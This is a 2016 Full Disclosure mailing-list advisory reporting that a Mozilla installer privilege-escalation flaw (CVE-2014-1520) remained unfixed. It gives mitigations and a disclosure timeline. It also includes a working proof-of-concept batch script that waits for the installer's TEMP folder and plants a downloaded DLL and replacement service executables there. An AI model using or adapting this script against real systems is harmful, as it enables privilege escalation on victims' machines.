[<prev] [next>] [day] [month] [year] [list]
Message-ID: <AC7734DD36F44208813991EFDAD33D7C@W340>
Date: Wed, 15 Jun 2016 00:37:48 +0200
From: "Stefan Kanthak" <stefan.kanthak@...go.de>
To: <bugtraq@...urityfocus.com>
Cc: fulldisclosure@...lists.org
Subject: [FD] [CVE-2014-1520] NOT FIXED: privilege escalation via Mozilla's
executable installers
Hi @ll,
<https://bugzilla.mozilla.org/show_bug.cgi?id=961676> should
have fixed CVE-2014-1520 in Mozilla's executable installers for
Windows ... but does NOT!
JFTR: this type of vulnerability (really: a bloody stupid trivial
beginner's error!) is well-known and well-documented as
<https://cwe.mitre.org/data/definitions/379.html>.
Proof of concept/demonstration:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
0. download "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
and save them in an arbitrary directory;
1. download <http://home.arcor.de/skanthak/download/SHFOLDER.DLL>
plus <http://home.arcor.de/skanthak/download/SENTINEL.EXE> and
save them in an(other) arbitrary directory;
2. start your editor, copy and paste the following 10 lines and
save them as "POC.CMD" in the same directory as "SHFOLDER.DLL"
and "SENTINEL.EXE" downloaded in step 1:
:WAIT1
@If Not Exist "%TEMP%\7z*.tmp" Goto :WAIT1
For /D %%! In ("%TEMP%\7z*.tmp") Do Set foobar=%%!
Copy "%~dp0shfolder.dll" "%foobar%\shfolder.dll"
:WAIT2
@If Not Exist "%foobar%\core\maintenanceservice.exe" Goto :WAIT2
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice.exe"
:WAIT3
@If Not Exist "%foobar%\core\maintenanceservice_installer.exe" Goto :WAIT3
Copy "%~dp0sentinel.exe" "%foobar%\core\maintenanceservice_installer.exe"
3. execute the batch script "POC.CMD" created in step 2;
4. execute "Firefox Setup Stub 47.0.exe", "Firefox Setup 47.0.exe",
"Firefox Setup 45.2.0esr.exe" or "Thunderbird Setup 45.1.1.exe"
downloaded in step 0. and proceed as directed: notice the message
boxed displayed from the copies of "SHFOLDER.DLL" and "SENTINEL.EXE"
placed by the batch script started in step 3 in the unsafe TEMP
subdirectory created by Mozilla's vulnerable executable installers!
PWNED!
Mitigation(s):
~~~~~~~~~~~~~~
0. don't use executable installers. DUMP THEM, NOW!
1. see <http://home.arcor.de/skanthak/!execute.html> as well as
<http://home.arcor.de/skanthak/SAFER.html>.
2. stay away from Mozilla's vulnerable installers for their Windows
software (at least until Mozilla starts to develop a sense for
the safety and security of their users).
stay tuned
Stefan Kanthak
Timeline:
~~~~~~~~~
2015-10-25 <https://bugzilla.mozilla.org/show_bug.cgi?id=1218199>
not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2015/10/23/mozilla-launches-open-source-support-program/>)
2016-04-30 <https://bugzilla.mozilla.org/show_bug.cgi?id=1269111>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269113>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269122>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269123>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269142>
<https://bugzilla.mozilla.org/show_bug.cgi?id=1269144>
not even an attempt to fix this vulnerability (check but
<https://blog.mozilla.org/blog/2016/06/09/help-make-open-source-secure/>)
2016-06-15 deadline expired after 45 days, report published
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists